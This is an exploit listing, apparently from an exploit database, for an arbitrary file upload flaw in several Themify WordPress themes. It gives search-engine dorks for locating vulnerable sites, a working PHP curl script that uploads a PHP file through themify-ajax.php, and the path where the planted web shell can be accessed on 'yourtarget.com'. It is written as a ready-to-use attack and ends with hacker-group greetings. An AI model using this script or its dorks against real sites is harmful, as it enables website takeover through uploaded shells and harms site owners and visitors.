Wordpress Themify Arbitrary File Upload Vulnerability

2014-03-31T00:00:00
ID 1337DAY-ID-22090
Type zdt
Reporter Jje Incovers
Modified 2014-03-31T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #Title : Wordpress Themify Arbitrary File Upload Vulnerability
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : TXT, PHP, HTML, HTM, ASP, Etc.
#Vendor : http://themify.me/
#Download : http://themify.me/themes
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : File Upload
#Scanning Theme : [ Flatshop, Magazine , Flat Flat , Parallax , Bold, Metro , Pinshop , Agency , Slide , Postline , Fullscreen , Pinboard , Shopo , Minshop , Notes , ShopDock , PhotoTouch , Basic , Responz , Simfo , Grido , Tisa , Suco , Elemin , Folo , Funki , Minblr , iTheme2 , Newsy , Wumblr , Rezo , Photobox , Edmin , Koi , Bizco , ThemeMin , Wigi , Blogfolio , Sidepane , Bloggie ]

#Dork :
inurl:"/wp-content/themes/Elemin/"
inurl:"/wp-content/themes/Bloggie/"
inurl:"/wp-content/themes/Tisa/"
inurl:"/wp-content/themes/Funki/"
inurl:"/wp-content/themes/Pinboard/"
inurl:"/wp-content/themes/FOlo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/Suco/"
inurl:"/wp-content/themes/iThemes2/"

Arbitrary File Upload

Exploit : /wp-content/themes/select a theme/themify/themify-ajax.php

Example :

Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php

Script :

<?php
$uploadfile="inc0vers.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access :

http://yourtarget.com/wp-content/themes/select a theme/uploads/your file

Example :

Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/uploads/inc0vers.php

Note :
Change theme in the script equate with your dork !!

----------------------------"

########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member Sanjungan Jiwa , MrTieDie , Co-p1r3 , Jje Incovers , Ice-Cream
########################################

#  0day.today [2018-01-09]  #